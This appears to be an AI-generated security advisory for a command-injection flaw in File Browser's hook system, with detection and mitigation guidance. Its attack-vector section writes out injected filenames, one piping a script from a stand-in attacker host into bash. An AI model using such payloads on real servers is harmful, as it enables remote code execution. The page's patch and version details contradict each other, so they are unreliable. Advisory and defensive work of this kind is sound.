CVE-2026-35585 Overview
File Browser is a web-based file managing interface that allows users to upload, delete, preview, rename, and edit files within a specified directory. A critical OS command injection vulnerability has been discovered in the hook system functionality of File Browser versions 2.0.0 through 2.63.1. The hook system, which executes administrator-defined shell commands on file events such as upload, rename, and delete, fails to properly sanitize variable substitutions for values like $FILE and $USERNAME. This unsanitized expansion via os.Expand allows an attacker with file write permission to craft a malicious filename containing shell metacharacters, causing the server to execute arbitrary OS commands when the hook fires, resulting in Remote Code Execution (RCE).
Critical Impact
An attacker with file write permission can achieve Remote Code Execution on the server by uploading files with specially crafted filenames containing shell metacharacters that are executed when hooks process file events.
Affected Products
- File Browser versions 2.0.0 through 2.63.1
- Installations with custom hooks enabled (disabled by default since v2.33.8)
Discovery Timeline
- 2026-04-07 - CVE-2026-35585 published to NVD
- 2026-04-08 - Last updated in NVD database
Technical Details for CVE-2026-35585
Vulnerability Analysis
This vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command), commonly known as OS Command Injection. The flaw exists in File Browser's hook system, which is designed to execute shell commands in response to file operations. The implementation uses Go's os.Expand function to perform variable substitution for dynamic values like filenames and usernames without any sanitization or escaping of shell metacharacters.
When an administrator configures hooks to respond to file events (upload, rename, delete), the hook command template includes variables that are expanded at runtime. Since these variables can contain user-controlled data such as filenames, an attacker can inject shell commands by including metacharacters like semicolons (;), backticks, or command substitution syntax ($(...)) within filenames.
The attack requires file write permission on the File Browser instance, meaning the attacker must have some level of authenticated access. However, once this prerequisite is met, the vulnerability allows complete command execution with the privileges of the File Browser server process.
Root Cause
The root cause lies in the unsafe use of os.Expand for variable substitution in shell commands without proper input sanitization. The function directly expands user-controlled variables like $FILE and $USERNAME into command strings that are subsequently passed to shell execution. No escaping or validation is performed to prevent shell metacharacters from being interpreted as command separators or operators.
Attack Vector
The attack is network-based and requires the attacker to have authenticated access with file write permissions. The exploitation flow involves:
- The attacker authenticates to a File Browser instance that has hooks configured for file events
- The attacker uploads a file with a malicious filename containing shell metacharacters (e.g., test$(whoami).txt or file; curl attacker.com/shell.sh | bash;.txt)
- When the upload hook triggers, the filename is expanded into the hook command without sanitization
- The shell interprets the metacharacters, executing the injected commands with the server's privileges
The vulnerability specifically targets the variable substitution mechanism. For detailed technical analysis and proof-of-concept information, see the GitHub Security Advisory GHSA-jvpw-637p-h3pw.
Detection Methods for CVE-2026-35585
Indicators of Compromise
- Filenames containing shell metacharacters such as ;, |, $(), backticks, or && in File Browser upload directories
- Unexpected process spawning by the File Browser server process
- Unusual network connections originating from the File Browser application
- Evidence of command execution in system logs correlating with file upload times
Detection Strategies
- Monitor File Browser logs for file operations with suspicious filenames containing shell metacharacters
- Implement file system monitoring to detect unusual file creations with special characters
- Deploy endpoint detection rules to identify child process spawning from File Browser executables
- Review hook configurations to identify potentially vulnerable setups using $FILE or $USERNAME variables
Monitoring Recommendations
- Enable verbose logging in File Browser to capture all file operation events
- Configure SIEM rules to alert on filenames containing common command injection patterns
- Monitor process trees for unexpected shell command execution originating from the File Browser process
- Implement network monitoring to detect data exfiltration attempts from compromised servers
How to Mitigate CVE-2026-35585
Immediate Actions Required
- Disable all custom hooks in File Browser installations running versions 2.0.0 through 2.63.1
- Upgrade to File Browser version 2.33.8 or later where hooks are disabled by default
- Review existing hook configurations and remove any that use user-controllable variables
- Audit file upload directories for suspicious filenames that may indicate exploitation attempts
- Restrict file write permissions to trusted users only
Patch Information
The File Browser maintainers have addressed this vulnerability by disabling the hook feature by default for all installations from version 2.33.8 onwards, including existing installations. Organizations should upgrade to the latest available version and ensure that hooks remain disabled unless absolutely necessary. For additional details, refer to the GitHub Issue #5199 and the GitHub Security Advisory GHSA-jvpw-637p-h3pw.
Workarounds
- Disable all hooks in the File Browser configuration until an upgrade can be performed
- Implement filename validation at the application or reverse proxy level to reject filenames containing shell metacharacters
- Run File Browser in a containerized environment with minimal privileges to limit the impact of command execution
- Use Web Application Firewall (WAF) rules to block file uploads with suspicious filename patterns
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
